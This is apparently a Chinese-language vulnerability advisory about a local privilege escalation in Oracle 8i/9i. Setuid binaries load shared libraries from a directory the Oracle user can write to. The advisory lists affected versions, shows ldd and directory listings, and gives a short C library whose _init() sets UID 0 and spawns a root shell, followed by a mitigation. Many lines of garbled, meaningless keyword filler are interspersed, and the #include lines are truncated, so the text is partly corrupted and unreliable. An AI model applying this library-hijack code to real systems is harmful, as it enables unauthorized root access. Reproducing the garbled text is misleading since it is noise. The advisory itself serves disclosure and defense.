受影响系统：
Oracle Oracle8i Standard Edition 9.2 .0.2
Oracle Oracle8i Standard Edition 9.2 .0.1
Oracle Oracle8i Standard Edition 9.0.2
Oracle Oracle8i Standard Edition 9.0.1 .4
Oracle Oracle8i Standard Edition 9.0.1 .3
Oracle Oracle8i Standard Edition 9.0.1 .2
Oracle Oracle8i Standard Edition 9.0.1
Oracle Oracle8i Standard Edition 9.0
Oracle Oracle8i Standard Edition 8.1.7 .4
Oracle Oracle8i Standard Edition 8.1.7 .1
Oracle Oracle8i Standard Edition 8.1.7 .0.0
Oracle Oracle8i Standard Edition 8.1.7
Oracle Oracle8i Standard Edition 8.1.6
Oracle Oracle8i Standard Edition 8.1.5
Oracle Oracle8i Personal Edition 9.2 .0.2
Oracle Oracle8i Personal Edition 9.2 .0.1
Oracle Oracle8i Personal Edition 9.0.1
Oracle Oracle8i Enterprise Edition 9.2 .0.2
Oracle Oracle8i Enterprise Edition 9.2 .0.1
Oracle Oracle8i Enterprise Edition 9.0.1
Oracle Oracle8i Enterprise Edition 8.1.7 .1.0
Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
Oracle Oracle8i Enterprise Edition 8.1.6 .1.0
Oracle Oracle8i Enterprise Edition 8.1.6 .0.0
Oracle Oracle8i Enterprise Edition 8.1.5 .1.0
Oracle Oracle8i Enterprise Edition 8.1.5 .0.2
Oracle Oracle8i Enterprise Edition 8.1.5 .0.0
Oracle Oracle8i Client Edition 9.2 .0.2
Oracle Oracle8i Client Edition 9.2 .0.1
Oracle Oracle8i 9.0.1
Oracle Oracle8i 9.0
Oracle Oracle8i 8.1.7.1
Oracle Oracle8i 8.1.7
Oracle Oracle8i 8.1.6
Oracle Oracle8i 8.1.5
Oracle Oracle8i 8.0.6
Oracle Oracle8i 8.0.5
Oracle Oracle8i 8.0.4
Oracle Oracle8i 8.0.2
Oracle Oracle8i 8.0.1
Oracle Oracle9i Standard Edition 9.2.0.4
Oracle Oracle9i Standard Edition 9.2.0.1
Oracle Oracle9i Release 2 9.2.2
Oracle Oracle9i Release 2 9.2.1
Oracle Oracle9i Personal Edition 9.2.0.4
Oracle Oracle9i Personal Edition 9.2.0.1
Oracle Oracle9i Enterprise Edition 9.2.0.4
Oracle Oracle9i Enterprise Edition 9.2.0.1
Oracle Oracle9i 9.2.0.3
Oracle Oracle9i 9.2.0.2
Oracle Oracle9i 9.2.0.1
Oracle Oracle9i 9.2
Oracle Oracle9i 9.0.2
Oracle Oracle9i 9.0.1.4
Oracle Oracle9i 9.0.1.3
Oracle Oracle9i 9.0.1.2
Oracle Oracle9i 9.0.1
Oracle Oracle9i 9.0
描述：
--------------------------------------------------------------------------------
Oracle是一种强大的企业级库。
服务 ，补丁绿升级 盟 拒绝服务。科缓冲缓冲技攻击病毒，补丁漏服务安全洞崩溃拒绝的溢出库崩溃的拒绝服务的
Oracle不正确对lib库目录进行限制，本地攻击者可以利用这个进行提升攻击。
程序缓冲绿数据，盟安全。，程序病毒科 攻击病毒补丁技升级病毒厂商漏的数据缓冲安全程序洞溢出拒绝的程序补丁库 程序程序程序
部分setuid属性的应用程序如'/bin/dbsnmp'、'/bin/nmo'以如下方法调用共享库，如：
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商，库程序服务
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
libthread.so.1 => /usr/lib/libthread.so.1
libkstat.so.1 => /usr/lib/libkstat.so.1
....
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商，库程序服务
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/nmo
libnsl.so.1 => /usr/lib/libnsl.so.1
libsocket.so.1 => /usr/lib/libsocket.so.1
libgen.so.1 => /usr/lib/libgen.so.1
.....

但是lib目录却为iasr2可写：
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商，库程序服务
[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
...
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商，库程序服务
因此iasr2可以简单地创建，如so.lib:
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商，库程序服务
#include
#include
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商，库程序服务
_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商，库程序服务
当受此影响的程序时，可导致恶意库被装载而命令。

<*来源：Juan Manuel Pascual （jmpascual@open3s.com）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=109147677214087&w=2
*>

建议：
--------------------------------------------------------------------------------
临时解决方法：

如果您不能立刻安装或者升级，NSFOCUS建议您采取以下措施以降低威胁：
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商，库程序服务
* 把lib库设置为只有root可写。

厂商：